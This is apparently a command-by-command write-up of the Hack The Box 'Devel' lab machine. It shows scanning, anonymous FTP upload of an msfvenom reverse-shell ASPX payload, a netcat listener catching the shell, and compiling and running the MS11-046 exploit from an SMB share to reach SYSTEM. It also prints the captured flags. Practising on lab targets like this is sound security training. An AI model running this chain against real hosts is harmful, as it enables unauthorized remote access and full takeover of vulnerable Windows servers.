Devel
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.5
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-24 06:40 EDT
Nmap scan report for 10.10.10.5
Host is up (0.16s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.5 -p21,80 -sV -A
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-24 06:41 EDT
Nmap scan report for 10.10.10.5
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 164.04 ms 10.10.14.1
2 164.12 ms 10.10.10.5
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 18.54 secondsFTP
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> get welcome.png
local: welcome.png remote: welcome.png
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************| 180 KiB 180.57 KiB/s 00:00 ETAftp: Reading from network: Interrupted system call
0% | | -1 0.00 KiB/s --:-- ETA
226 Transfer complete.
WARNING! 820 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> get iisstart.htm
local: iisstart.htm remote: iisstart.htm
229 Entering Extended Passive Mode (|||49161|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************| 689 4.12 KiB/s 00:00 ETA
226 Transfer complete.
689 bytes received in 00:00 (4.12 KiB/s)
ftp> cd aspnet_client
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49164|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> 2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49166|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
┌──(kali㉿kali)-[~]
└─$ cat iisstart.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "<http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>">
<html xmlns="<http://www.w3.org/1999/xhtml>">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#B3B3B3;
margin:0;
}
#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}
a img {
border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="<http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409>"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html> Initial Foothold
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f aspx > devel.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2716 bytes
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put devel.aspx
local: devel.aspx remote: devel.aspx
229 Entering Extended Passive Mode (|||49176|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************| 2914 49.62 MiB/s --:-- ETA
226 Transfer complete.
2914 bytes sent in 00:00 (17.26 KiB/s)
ftp>
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.5] 49195
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\\windows\\system32\\inetsrv>whoami
whoami
iis apppool\\web
c:\\Users>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 24/10/2024, 1:39:29 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\\Windows
System Directory: C:\\Windows\\system32
Boot Device: \\Device\\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.455 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.533 MB
Virtual Memory: In Use: 608 MB
Page File Location(s): C:\\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::9c08:298d:29c1:27df
[03]: dead:beef::292a:ebfc:8e34:a619
[04]: dead:beef::9c08:298d:29c1:27dfPrivilege Escalation
https://www.rapid7.com/blog/post/2009/12/28/exploiting-microsoft-iis-with-metasploit/
┌──(kali㉿kali)-[~]
└─$ i686-w64-mingw32-gcc 40564.c -o MS11–046.exe -lws2_32
┌──(kali㉿kali)-[~]
└─$ impacket-smbserver kali Desktop
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.5,49173)
[*] AUTHENTICATE_MESSAGE (\\,DEVEL)
[*] User DEVEL\\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:KALI)
[*] AUTHENTICATE_MESSAGE (\\,DEVEL)
[*] User DEVEL\\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] AUTHENTICATE_MESSAGE (\\,DEVEL)
[*] User DEVEL\\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[-] Unknown level for query path info! 0x4
<https://www.rapid7.com/blog/post/2009/12/28/exploiting-microsoft-iis-with-metasploit/>
c:\\Windows\\System32\\inetsrv>\\\\10.10.14.5\\kali\\MS11046.exe
\\\\10.10.14.5\\kali\\MS11046.exe
c:\\Windows\\System32>whoami
whoami
nt authority\\system
c:\\Windows\\System32>type C:\\Users\\Administrator\\Desktop\\root.txt
type C:\\Users\\Administrator\\Desktop\\root.txt
6e2fedcb532ba90ef7a2d20fc6e9a6ff
c:\\Windows\\System32>type C:\\Users\\babis\\Desktop\\user.txt
type C:\\Users\\babis\\Desktop\\user.txt
b17a4ce7fc2a4cd35301ee7870938e48b17a4ce7fc2a4cd35301ee7870938e48
6e2fedcb532ba90ef7a2d20fc6e9a6ff
Last updated